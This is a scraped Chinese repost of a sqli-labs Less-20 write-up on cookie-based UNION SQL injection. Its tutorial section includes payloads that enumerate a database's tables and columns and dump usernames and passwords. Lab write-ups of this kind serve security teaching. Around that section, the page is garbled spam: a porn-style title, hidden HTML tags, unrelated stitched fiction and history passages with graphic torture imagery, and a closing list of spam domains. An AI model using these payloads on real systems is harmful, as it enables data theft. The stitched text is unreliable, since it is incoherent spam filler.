亚洲春色欧美激情

<form id=WZeJxaBel><nobr id=WZeJxaBel></nobr></form>

<address id=WZeJxaBel><nobr id=WZeJxaBel><nobr id=WZeJxaBel></nobr></nobr></address>

首頁 > 數據庫 > 詳細

利用cookie進行SQL注入——看來還是人工注入要熟悉才行

時間：2021-06-15 17:51:06 阅读：0 評論：0 收藏：0 [點我收藏+]

標簽：edit pos security 修改獲取 sele 這一 F12 讀取

    Less-20

    基于错误的cookie头部POST注入

首先從已知的條件中我們知道這又是一道“頭部注入”，那麽我們先輸入正確的用戶名和密碼看一下登錄成功是什麽樣子的：

        回显有User-Agent、IP这样从当次Request直接獲取的，
        也有Cookie这样刷新页面后仍存在的，
        还有登录用户的id、username、password。
        最下方是删除Cookie的按钮，点击后刷新到初始界面。

從題意中我們大致可推斷出注入點在cookie上：（查看後台核心源碼：）

可以看到查詢語句查詢變量$cookee，且是單引號字符型，那麽我們就在cookie裏注入：
我們先查看一下請求頭中的cookie值，我們可以有很多方法查看：

        burpsuite抓包，看响应头
        Chrome插件Edit This Cookie查看，存储的Cookie信息：
        浏览器，按F12，在“网络”中查看，看响应头

1.burpsuite抓包過程：

2.Chrome插件Edit This Cookie查看，存储的Cookie信息：（没用过，截取别人的）

可以看到只存储了uname這一个字段的信息，且是明文存储。
修改Cookie後刷新界面：

3.F12查看

從上面的操作中，可知操作流程：

        登陆后将uname写入Cookie。
        在每次Request (GET / POST)页面时后台判断Cookie是否存在，若不存在则为登录界面；若存在则讀取Cookie中字段uname。
        在數據庫中按username查询，若用户存在则将查询到用户id、username、password回显；若不存在…

    可以判断出注入点就在Cookie处，但是这里注入有三种途径：

        用Chrome插件EditThisCookie修改本地Cookie文件注入。
        用Firefox浏览器插件HackBar修改本地Cookie文件注入(这个并不是很好用，不推荐用)。
        用Burpsuite修改登陆(POST)成功后刷新时GET请求头中的Cookie值注入，这种方式不会修改本地的Cookie文件。

這裏演示第二個途徑：
我們得出後台根據Cookie中的uname查詢用戶的所有信息，即這是個SELECT語句，我們可以使用最簡單的UNION注入。
1.判断字符型 / 数字型注入
爆出語法錯誤，看得出來就是單引號型;
2.判斷字段數與回顯字段

uname=Dumb‘ order by 4 -- #

uname=1‘ union select 1,2,3 -- #

    PS：

    关于獲取字段的小技巧：我们从后台源码中，一般只要看到 select * from 表名，一般是要猜这个表里的所有字段，然后进行注入，如果是 select username,password from 表名，这种形式的可以直接利用2个字段，作为语句的注入字段。

3.暴庫：

uname=1‘ union select 1,2,database() -- #

暴表：

uname=1‘ union select 1,2,group_concat(table_name)from information_schema.tables where table_schema=‘security‘ -- #

暴字段：

uname=1‘ union select 1,2,group_concat(column_name)from information_schema.columns where table_schema=‘security‘ and table_name=‘users‘ -- #

暴數據：（這兩種其實是一樣的）

uname=1‘ union select 1,2,group_concat(username,0x7e,password)from security.users -- #

uname=1‘ union select 1,2,group_concat(concat_ws(‘-‘,id,username,password)) from users# -- #

上面就是簡單的基于報錯的注入

利用cookie進行SQL注入——看來還是人工注入要熟悉才行

標簽：edit pos security 修改獲取 sele 這一 F12 讀取

原文地址：https://www.cnblogs.com/bonelee/p/14883286.html

踩

(0)

贊

(0)

舉報

評論一句话評論（0）

分享檔案

更多>

2021年07月29日 (22)
2021年07月28日 (40)
2021年07月27日 (32)
2021年07月26日 (79)
2021年07月23日 (29)
2021年07月22日 (30)
2021年07月21日 (42)
2021年07月20日 (16)
2021年07月19日 (90)
2021年07月16日 (35)

周排行

更多

友情鏈接

蘭亭集智國之畫百度統計站長統計阿裏雲 chrome插件新版天聽網

關于我們 - 聯系我們 - 留言反饋

? 2014 mamicode.com 版權所有聯系我們:gaon5@hotmail.com

迷上了代碼！

"I acquaint the inhabitants of Liège of this, that they may understand what fate threatens them if they should assume a similar attitude. A raiding party of hostiles had passed near the fort, and had killed, with particular atrocity, a family of settlers. The man and his wife had been tortured to death, the baby had had its brains beaten out against the trunk of a tree, a very young child had been hung by the wrist tendons to two meat hooks on the walls of the ranch-house, and left there to die. One big boy had had his eyelids and lips and nose cut off, and had been staked down to the ground with his remains of a face lying over a red-ant hole. Only two had [Pg 196]managed to escape,—a child of ten, who had carried his tiny sister in his arms, twenty miles of ca?ons and hills, to the post. Every engine of the English Court was put in motion to prevent the Electoral Prince from coming. Oxford had an interview with Schutz, in which he repeated that it was his applying for the writ to the Lord Chancellor instead of to the queen that had done all the mischief; that her Majesty, had it not been for this untoward incident, would have invited the Prince to come over and spend the summer in England—forgetting, as Schutz observed, that the minute before he had assured him that the queen was too much afraid of seeing any of that family here. He advised Schutz—who could not be convinced that he had done anything irregular in his application, quoting numerous proofs to show that it was the accustomed mode of applying for writs—to avoid appearing again at Court; but Schutz, not seeming disposed to follow that advice, immediately received a positive order to the same effect from the queen through another channel. Schutz, therefore, lost no time in returning to Hanover to justify himself. At the same time, Lord Strafford was instructed to write from the Hague, blaming the conduct of Schutz in applying for the writ in the manner he did, as disrespectful to the queen; for, though strictly legal for an absent peer to make such application, the etiquette was that he should defer it till he could do it personally. Strafford ridiculed the idea of any movement being afoot in favour of the Pretender, and observed that, as to sending him out of the Duke of Lorraine's territory, it was not practicable, because the French king maintained that he had fulfilled the treaty, Lorraine not being any part of France. On the other hand, there were striking signs that the cause[17] of Hanover was in the ascendant. Men who watched the course of events decided accordingly. Marlborough, who so lately had been making court to the Pretender, now wrote from Antwerp, urging the House of Hanover to send over the prince without delay to England; that the state of the queen's health made prompt action necessary; and that the presence of the prince in London would secure the succession without risk, without expense, and without war, and was the likeliest measure of inducing France to abandon its design of assisting the Pretender. Shorty had been frantically trying to catch the Deacon's eye, and was making all manner of winks and warning gestures without avail, for the Deacon answered frankly: "Sure you do," Dodd said, and his voice began to rise. He went to the bed, walked along its length to the window, as he talked, never facing Albin. "You know how to make me feel just fine, no worries at all, no complications, just a nice, simple life. With nothing at all in it, Albin. Nothing at all." J. O., I mean it. "Good-bye, my Bluebell, farewell to you, "Cudn't spare one hand to fetch over fifteen—that's a valiant idea. Now d?an't go loitering; fetch out your cattle afore they're roast beef, git out the horses and all the stock—and souse them ricks wot ?un't burning yit." "Do you know my voice?" asked one of Wells's companions. HoME 亚洲春色欧美激情 ENTER NUMBET 0010aasvcew.com.cn
bbridger.org.cn
greenbowtie.com.cn
imo-fabrics.com.cn
www.lelove.com.cn
www.od4.com.cn
puping.com.cn
www.shatedu.cn
www.unubank.org.cn
zwtdwy38.com.cn